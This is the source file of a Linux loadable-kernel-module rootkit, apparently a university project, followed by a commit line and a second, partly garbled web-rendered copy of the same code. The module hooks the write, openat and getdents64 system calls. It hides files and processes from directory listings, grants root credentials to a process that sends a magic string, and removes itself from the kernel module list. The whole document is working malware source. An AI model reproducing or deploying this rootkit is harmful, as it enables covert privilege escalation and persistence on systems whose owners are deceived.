lkm_rootkit/rootkit.c

// LKM_rootkit
// Copyright © 2021 Volodymyr Patuta
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program.  If not, see <http://www.gnu.org/licenses/>.

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/dirent.h>

#include "fthook.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Volodymyr Patuta");
MODULE_DESCRIPTION("University project");
MODULE_VERSION("0.0.1");

unsigned int target_fd = 0;
unsigned int target_pid = 0;
static asmlinkage long (*orig_sys_openat)(struct pt_regs *);
static asmlinkage long (*orig_sys_write)(struct pt_regs *);
static asmlinkage long (*orig_sys_getdents64)(struct pt_regs *);
static int make_me_root(void);
static void hide(void);
static void unhide(void);
struct list_head *list;
static int is_hidden = 0;
static const char *hide_prefix = "BOOM";
const int hide_prefix_len = 4;
char given_pid[200];
static char hidden_pid[200][200];
static int hidden_pids = 0;

static asmlinkage long fh_sys_getdents64(struct pt_regs *regs)
{
	struct linux_dirent64 __user *dirent = (struct linux_dirent64 *)regs->si;
	struct linux_dirent64 *prev_dir, *current_dir, *orig = NULL;
	unsigned long offset = 0;
	long err;

	int ret = orig_sys_getdents64(regs);
	orig = kzalloc(ret, GFP_KERNEL);

	if (ret <= 0 || orig == NULL) {
		return ret;
	}

	err = copy_from_user(orig, dirent, ret);
	if (err) {
		kfree(orig);
		return ret;
	}

	while (offset < ret) {
		current_dir = (void *)orig + offset;
		if ((memcmp(given_pid, current_dir->d_name, strlen(given_pid)) == 0) &&
			(strncmp(given_pid, "", NAME_MAX) != 0)) {
			if (current_dir == orig) {
				ret -= current_dir->d_reclen;
				memmove(current_dir, (void *)current_dir + current_dir->d_reclen, ret);
				continue;
			}
			prev_dir->d_reclen += current_dir->d_reclen;
		}
		if (memcmp(hide_prefix, current_dir->d_name, hide_prefix_len) == 0) {
			if (current_dir == orig) {
				ret -= current_dir->d_reclen;
				memmove(current_dir, (void *)current_dir + current_dir->d_reclen, ret);
				continue;
			}
			prev_dir->d_reclen += current_dir->d_reclen;
		} else {
			prev_dir = current_dir;
		}

		offset += current_dir->d_reclen;
	}
	err = copy_to_user(dirent, orig, ret);
	if (err) {
		kfree(orig);
		return ret;
	}
	kfree(orig);
	return ret;
}

static asmlinkage long fh_sys_openat(struct pt_regs *regs)
{
	long ret;
	struct task_struct *task;
	task = current;

	if (strncmp((char *)regs->si, "/dev/null", 15) == 0) {
		ret = orig_sys_openat(regs);
		target_fd = ret;
		target_pid = task->pid;
		return ret;
	}

	ret = orig_sys_openat(regs);

	return ret;
}

static asmlinkage long fh_sys_write(struct pt_regs *regs)
{

	struct task_struct *task;
	task = current;
	if (task->pid == target_pid) {
		if (regs->di == 1 || regs->di == target_fd) {
			char __user *buf = (char *)regs->si;
			if (strncmp(buf, "secretroot", 10) == 0) {
				make_me_root();
			} else if (strncmp(buf, "secrethideme", 12) == 0) {
				hide();
			} else if (strncmp(buf, "secretreveal", 12) == 0) {
				unhide();
			} else if (strncmp(buf, "secrethide$", 11) == 0) {
				given_pid[0] = '\0';
				strncat(given_pid, buf + 11, strlen(buf + 11) - strlen(strrchr(buf, '$')));
				printk(KERN_DEBUG "rootkit: buf [%s]\n", given_pid);
			}
		}
	}
	return orig_sys_write(regs);
}

static struct ftrace_hook hooks[] = {
  HOOK("sys_write", fh_sys_write, &orig_sys_write),
  HOOK("sys_openat", fh_sys_openat, &orig_sys_openat),
  HOOK("sys_getdents64", fh_sys_getdents64, &orig_sys_getdents64),
};

static int make_me_root(void)
{
	struct pid *proc_pid;
	struct task_struct *task;
	struct cred *new_cred;
	kuid_t kuid;
	kgid_t kgid;
	// printk(KERN_ERR "BOOM! [%llu]\n", val);

	proc_pid = find_vpid(target_pid);
	if (proc_pid == NULL) {
		printk(KERN_ERR "ERR find_vpid()\n");
		return 1;
	}

	task = pid_task(proc_pid, PIDTYPE_PID);
	if (task == NULL) {
		printk(KERN_ERR "ERR pid_task()\n");
		return 2;
	}

	kuid = KUIDT_INIT(0);
	kgid = KGIDT_INIT(0);

	new_cred = prepare_creds();
	if (new_cred == NULL) {
		printk(KERN_ERR "ERR prepare_creds()\n");
		return 3;
	}

	new_cred->uid = kuid;
	new_cred->gid = kgid;
	new_cred->euid = kuid;
	new_cred->egid = kgid;

	commit_creds(new_cred);

	return 0;
}

static void hide(void)
{
	if (is_hidden) {
		return;
	}

	list = THIS_MODULE->list.prev;

	list_del(&THIS_MODULE->list);

	is_hidden = 1;
}

static void unhide(void)
{
	if (!is_hidden) {
		return;
	}

	list_add(&THIS_MODULE->list, list);

	is_hidden = 0;
}

static int __init boom_init(void)
{
	int err;

	pr_info("BOOM\n");

	err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
	if (err)
		return err;
	// hide();

	pr_info("module loaded\n");
	return 0;
}

static void __exit boom_exit(void)
{
	fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
	pr_info("Psshhh\n");
}

module_init(boom_init);
module_exit(boom_exit);
I solemnly swear that I am up to no good. 2021-11-30 22:59:25 +01:00			`// LKM_rootkit`
			`// Copyright © 2021 Volodymyr Patuta`
			`//`
			`// This program is free software: you can redistribute it and/or modify`
			`// it under the terms of the GNU General Public License as published by`
			`// the Free Software Foundation, either version 3 of the License, or`
			`// (at your option) any later version.`
			`//`
			`// This program is distributed in the hope that it will be useful,`
			`// but WITHOUT ANY WARRANTY; without even the implied warranty of`
			`// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the`
			`// GNU General Public License for more details.`
			`//`
			`// You should have received a copy of the GNU General Public License`
			`// along with this program. If not, see <http://www.gnu.org/licenses/>.`

			`#include <linux/kernel.h>`
			`#include <linux/module.h>`
			`#include <linux/dirent.h>`

			`#include "fthook.h"`

			`MODULE_LICENSE("GPL");`
			`MODULE_AUTHOR("Volodymyr Patuta");`
			`MODULE_DESCRIPTION("University project");`
			`MODULE_VERSION("0.0.1");`

			`unsigned int target_fd = 0;`
			`unsigned int target_pid = 0;`
			`static asmlinkage long (orig_sys_openat)(struct pt_regs );`
			`static asmlinkage long (orig_sys_write)(struct pt_regs );`
			`static asmlinkage long (orig_sys_getdents64)(struct pt_regs );`
			`static int make_me_root(void);`
			`static void hide(void);`
			`static void unhide(void);`
			`struct list_head *list;`
			`static int is_hidden = 0;`
			`static const char *hide_prefix = "BOOM";`
			`const int hide_prefix_len = 4;`
			`char given_pid[200];`
			`static char hidden_pid[200][200];`
			`static int hidden_pids = 0;`

			`static asmlinkage long fh_sys_getdents64(struct pt_regs *regs)`
			`{`
			`struct linux_dirent64 __user dirent = (struct linux_dirent64 )regs->si;`
			`struct linux_dirent64 prev_dir, current_dir, *orig = NULL;`
			`unsigned long offset = 0;`
			`long err;`

			`int ret = orig_sys_getdents64(regs);`
			`orig = kzalloc(ret, GFP_KERNEL);`

			`if (ret <= 0 \|\| orig == NULL) {`
			`return ret;`
			`}`

			`err = copy_from_user(orig, dirent, ret);`
			`if (err) {`
			`kfree(orig);`
			`return ret;`
			`}`

			`while (offset < ret) {`
			`current_dir = (void *)orig + offset;`
			`if ((memcmp(given_pid, current_dir->d_name, strlen(given_pid)) == 0) &&`
			`(strncmp(given_pid, "", NAME_MAX) != 0)) {`
			`if (current_dir == orig) {`
			`ret -= current_dir->d_reclen;`
			`memmove(current_dir, (void *)current_dir + current_dir->d_reclen, ret);`
			`continue;`
			`}`
			`prev_dir->d_reclen += current_dir->d_reclen;`
			`}`
			`if (memcmp(hide_prefix, current_dir->d_name, hide_prefix_len) == 0) {`
			`if (current_dir == orig) {`
			`ret -= current_dir->d_reclen;`
			`memmove(current_dir, (void *)current_dir + current_dir->d_reclen, ret);`
			`continue;`
			`}`
			`prev_dir->d_reclen += current_dir->d_reclen;`
			`} else {`
			`prev_dir = current_dir;`
			`}`

			`offset += current_dir->d_reclen;`
			`}`
			`err = copy_to_user(dirent, orig, ret);`
			`if (err) {`
			`kfree(orig);`
			`return ret;`
			`}`
			`kfree(orig);`
			`return ret;`
			`}`

			`static asmlinkage long fh_sys_openat(struct pt_regs *regs)`
			`{`
			`long ret;`
			`struct task_struct *task;`
			`task = current;`

			`if (strncmp((char *)regs->si, "/dev/null", 15) == 0) {`
			`ret = orig_sys_openat(regs);`
			`target_fd = ret;`
			`target_pid = task->pid;`
			`return ret;`
			`}`

			`ret = orig_sys_openat(regs);`

			`return ret;`
			`}`

			`static asmlinkage long fh_sys_write(struct pt_regs *regs)`
			`{`

			`struct task_struct *task;`
			`task = current;`
			`if (task->pid == target_pid) {`
			`if (regs->di == 1 \|\| regs->di == target_fd) {`
			`char __user buf = (char )regs->si;`
			`if (strncmp(buf, "secretroot", 10) == 0) {`
			`make_me_root();`
			`} else if (strncmp(buf, "secrethideme", 12) == 0) {`
			`hide();`
			`} else if (strncmp(buf, "secretreveal", 12) == 0) {`
			`unhide();`
			`} else if (strncmp(buf, "secrethide$", 11) == 0) {`
			`given_pid[0] = '\0';`
			`strncat(given_pid, buf + 11, strlen(buf + 11) - strlen(strrchr(buf, '$')));`
			`printk(KERN_DEBUG "rootkit: buf [%s]\n", given_pid);`
			`}`
			`}`
			`}`
			`return orig_sys_write(regs);`
			`}`

			`static struct ftrace_hook hooks[] = {`
			`HOOK("sys_write", fh_sys_write, &orig_sys_write),`
			`HOOK("sys_openat", fh_sys_openat, &orig_sys_openat),`
			`HOOK("sys_getdents64", fh_sys_getdents64, &orig_sys_getdents64),`
			`};`

			`static int make_me_root(void)`
			`{`
			`struct pid *proc_pid;`
			`struct task_struct *task;`
			`struct cred *new_cred;`
			`kuid_t kuid;`
			`kgid_t kgid;`
			`// printk(KERN_ERR "BOOM! [%llu]\n", val);`

			`proc_pid = find_vpid(target_pid);`
			`if (proc_pid == NULL) {`
			`printk(KERN_ERR "ERR find_vpid()\n");`
			`return 1;`
			`}`

			`task = pid_task(proc_pid, PIDTYPE_PID);`
			`if (task == NULL) {`
			`printk(KERN_ERR "ERR pid_task()\n");`
			`return 2;`
			`}`

			`kuid = KUIDT_INIT(0);`
			`kgid = KGIDT_INIT(0);`

			`new_cred = prepare_creds();`
			`if (new_cred == NULL) {`
			`printk(KERN_ERR "ERR prepare_creds()\n");`
			`return 3;`
			`}`

			`new_cred->uid = kuid;`
			`new_cred->gid = kgid;`
			`new_cred->euid = kuid;`
			`new_cred->egid = kgid;`

			`commit_creds(new_cred);`

			`return 0;`
			`}`

			`static void hide(void)`
			`{`
			`if (is_hidden) {`
			`return;`
			`}`

			`list = THIS_MODULE->list.prev;`

			`list_del(&THIS_MODULE->list);`

			`is_hidden = 1;`
			`}`

			`static void unhide(void)`
			`{`
			`if (!is_hidden) {`
			`return;`
			`}`

			`list_add(&THIS_MODULE->list, list);`

			`is_hidden = 0;`
			`}`

			`static int __init boom_init(void)`
			`{`
			`int err;`

			`pr_info("BOOM\n");`

			`err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));`
			`if (err)`
			`return err;`
			`// hide();`

			`pr_info("module loaded\n");`
			`return 0;`
			`}`

			`static void __exit boom_exit(void)`
			`{`
			`fh_remove_hooks(hooks, ARRAY_SIZE(hooks));`
			`pr_info("Psshhh\n");`
			`}`

			`module_init(boom_init);`
			`module_exit(boom_exit);`